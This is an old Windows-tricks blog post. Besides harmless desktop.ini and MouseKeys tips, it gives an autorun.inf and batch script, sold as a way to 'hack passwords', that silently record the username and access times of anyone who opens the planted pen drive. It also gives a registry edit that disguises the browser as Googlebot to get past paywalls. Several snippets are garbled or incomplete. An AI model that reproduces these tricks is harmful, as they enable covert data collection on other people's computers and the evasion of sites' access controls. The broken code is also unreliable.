Tuesday, October 19, 2010

Operate mouse pointer without mouse

Want To have fun With Mouse Cursor. Just Follow the Steps Below.

Iam giving you a trick

Press Left Alt + Left Shift + Num Lock Button + Ok

with the help of Numeric Keypad e.g ( Press and Hold the following Keys )

7          8          9

4                      6

1          2          3   

For Normal Click Press 5

Left Alt + Left Shift + Num Lock

Change Folder Background

It involves making a new desktop.ini system file for that folder, and changing the attributes for that folder.
First, select the picture you want for that folder. It should be sized 815 x 685, or you will get tiles (of course, if you want tiles, use a smaller pic).

You can use your photo editor to crop and/or resize the pic appropriately.
Note the address of the pic. You will need that.Create a folder (in Documents) to store the desktop.ini file you will make, because it will replace the current system.ini of the folder it's in.

Now, open your notepad. Paste the following code into it.

[{BE0981 40-A513-11D0-A3 A4-00C04FD706EC}]
IconArea_Image ="C:\your picture location.jpg"
IconArea_Text= 0x00000000

Make the following changes:

The first line has spaces in it. Remove those spaces.
In the second line, put the address of the pic you will use, in the quotes.
The third line is the color of the folder text. Use light colored text for dark pics, and dark colored text for light pics.
Some color codes you can use. Feel free to use others, if you know them.
Black - 0x00000000
Pink - 0x00FF99FF
Purple - 0x00FF99FF
Red - 0x00FF0000
White - 0x00FFFFFF

· Save the file as: desktop.ini
· Save as file type : All Files
· Save it in the storage folder you made.

Copy the desktop.ini file you just created, into the folder you want to change.
It should replace the one in there.

Go to START and RUN

Type: attrib +s "C:\Location of your folder"
The location of the folder you want to change is in the quotes.
Click OK (or Return)
Open your folder and the picture should be there!
If the desktop.ini files shows in the folder, you can right-click it,select Properties, and make it hidden.
Please note, this only changes the folder you put the desktop.ini file in, not all of them.

Display A Notice at the Startup of your Computer

If your PC has multiple users then you can now display legal notice to every user before they login to your PC. This legal notice will be displayed at every startup just before the Desktop is loaded. Using this you can tell your friends about the do’s and dont’s in your computer when they login in your absence. Well you can do this pretty easily. For this there is one small registry hack. Here is the step-by-step instruction to do this.
1. Go to Start->Run, type regedit and hit ENTER

2. Navigate to the following key in the registry


On the right side pane look for “legalnoticecaption“, double click on it and enter the desired Legal Notice Caption.

3. Next below this look for “legalnoticetext” and enter the desired Legal Notice Text. The legal notice text can be up to a page in it’s size so that it can include a set of do’s and dont’s for your computer.

4. After you do this just restart your computer and upon the next startup you can see the legal notice information for your computer. This trick works on both XP and Vista. You can also try it on Windows 7 and should work with no problems.

Monday, October 18, 2010

Make all websites think you are from Google

Ever experienced this? You ask Google to look something up; the engine returns with a number of finds, but if you try to open the ones with the most promising content, you are confronted with a registration page instead, and the stuff you were looking for will not be revealed to you unless you agree to a credit card transaction first....

The lesson you should have learned here is: Obviously Google can go where you can't.

Can we solve this problem? Yes, we can. We merely have to convince the site we want to enter, that WE ARE GOOGLE.

In fact, many sites that force users to register or even pay in order to search and use their content, leave a backdoor open for the Googlebot, because a prominent presence in Google searches is known to generate sales leads, site hits and exposure.

Examples of such sites are Windows Magazine, .Net Magazine, Nature, and many, many newspapers around the globe.

How then, can you disguise yourself as a Googlebot? Quite simple: by changing your browser's User Agent. Copy the following code segment and paste it into a fresh notepad file. Save it as Useragent.reg and merge it into your registry.

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]
"Compatible"="+http: // www .googlebot .com/ bot.html

Voila! You're done!

You may always change it back again.... I know only one site that uses you User Agent to establish your eligibility to use its services, and that's the Windows Update site...

To restore the IE6 User Agent, save the following code to NormalAgent.reg and merge with your registry:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Internet Settings\5.0\User Agent]
@="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

Information Gathering through USB drives

There are few ways to Hack Passwords using a USB Drive or Pen Drive.
Here is one of them..

Create an autorun.inf file on the root of your flash drive/Pendrive with the following contents:

action=Open folder to view files

Now, create a batch file called username.bat with the following contents:

@echo off
echo %username%>>users.dat
date /t>>users.dat
time /t>>users.dat
start "Explorer" %SystemRoot%\explorer.exe

Create username.bat and autorun.inf in the root of your pendrive

Save both file and you are good to go. Now whenever a user plugs your pendrive into their PC,it will display an autoplay option indicating that they have to click on the icon to open the drive to view its contents. A small DOS window will flash for a moment and then disappear.Now If you go into the root of the drive, you will find a new file called users.dat which will record the user names of all the users who have accessed your drive by clicking on the icon. You can open the DAT file using notepad and view its contents.

However..This is not a fool proof method as some geeks disable the autoplay option (or disable writing to USB drives) ,or they just bypass it by pressing RIGHT SHIFT key when the pendrive is connected and hence their name will not be recorded or they can delete the users.dat file. But that said,it will work fine nevertheless......

Alternatively, you can also use a Software USB HACK, but that will give you some problems as your Anti-Virus will keep deleting it.

And turning off anti-virus, specially when you are doing this kind of work, is highly not recommended.

Customized Backgrounds for your pen drive

Here is something, which will turn your boring background of your Pen Drive into a cool one, by putting yours or any other photo.

Just Follow these Steps

Step :1

Copy this code into notepad (copy and paste), then save it as "desktop.ini"


VeBRA sources - don't delete the tag above, it's there for XXXXX purposes -


2. Put "desktop.ini" file onto your flash drive and replace "your_picture" with the
name of the picture you want to use leaving the .jpg extention the same.

3. Now copy the same picture that you want to use onto your flash drive.

4. Close the window and open your pen drive again...and Enjoy your new background

Here is a Screen Shot of my Pen Drive